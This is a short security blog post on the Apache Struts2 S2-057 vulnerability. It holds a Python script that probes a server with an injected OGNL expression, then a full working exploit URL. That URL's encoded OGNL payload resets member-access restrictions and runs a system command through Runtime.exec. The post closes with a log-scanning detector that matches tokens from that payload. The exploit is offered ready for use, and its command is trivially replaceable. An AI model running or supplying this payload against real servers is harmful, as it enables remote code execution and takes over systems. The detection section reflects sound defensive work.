Struts2-057 (verification PoC + exp)

Published on 2018-08-24, 1794 views


st-057
Verification PoC download

# coding=utf-8
import sys

import requests


def check_vul(url):
    # Insert the OGNL arithmetic probe ${(111+111)} as an extra path segment
    # right after the second-to-last URL segment (the namespace position).
    url_piece = url.split('/')
    url_piece[-2] = url_piece[-2] + "/" + '${(111+111)}'
    test_url = '/'.join(url_piece)
    try:
        res = requests.get(test_url, timeout=10)
    except requests.RequestException:
        return None
    # Flag the target when the response was redirected (302) and the final
    # URL contains 222, the evaluated result of 111+111.
    if '302' in str(res.history) and '222' in res.url:
        # Message: "Struts2-057 vulnerability present!"
        print('存在 Struts2-057漏洞!')
        return True
    return False


if __name__ == '__main__':
    url = sys.argv[1]
    check_vul(url)

Attack exp
Pop the calculator

http://192.168.44.1:8080/struts2-showcase/%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d/actionChain1.action
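For the defending side, both the probe and the exp above put an OGNL expression (`${...}`) in the URL path, which is visible in web server access logs once percent-encoding is undone. The following is an added example, not part of the original post: the function names, the combined log format and the sample log lines are assumptions made for illustration, and the token list is taken from the exp URL above.

```python
import re
from urllib.parse import unquote, urlsplit

# OGNL expression opener (${ or %{) anywhere in the decoded URL path.
OGNL_OPEN = re.compile(r'[$%]\{')
# Tokens that appear in the exp URL on this page; used to grade severity.
RCE_TOKENS = ('@ognl.OgnlContext@', 'DEFAULT_MEMBER_ACCESS', 'setMemberAccess',
              'getExcludedClasses', 'getExcludedPackageNames', 'java.lang.Runtime')
# Request line and status code of a combined-format access log entry (assumed format).
REQ = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_path(target, rounds=3):
    """Return the URL path, percent-decoded repeatedly to undo double encoding."""
    path = urlsplit(target).path
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(target):
    """Return 'rce-attempt', 'ognl-probe' or None for one request target."""
    path = decode_path(target)
    if not OGNL_OPEN.search(path):
        return None
    if any(tok in path for tok in RCE_TOKENS):
        return 'rce-attempt'
    return 'ognl-probe'

def scan(lines):
    """Yield (line_number, verdict, http_status) for suspicious log lines."""
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        if m:
            verdict = classify(m.group(1))
            if verdict:
                yield n, verdict, int(m.group(2))

# Constructed sample log lines (not captured traffic).
SAMPLE = [
    '10.0.0.5 - - [24/Aug/2018:10:00:00 +0000] "GET /struts2-showcase/actionChain1.action HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Aug/2018:10:00:01 +0000] "GET /struts2-showcase/%24%7b(111+111)%7d/actionChain1.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [24/Aug/2018:10:00:02 +0000] "GET /struts2-showcase/%2524%257b(%2523cmd%253d%2540java.lang.Runtime%2540getRuntime())%257d/actionChain1.action HTTP/1.1" 200 0',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(hit)
```

A hit with status 302, as the verification PoC checks for, is worth triaging first, since that is the response the PoC treats as confirmation.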
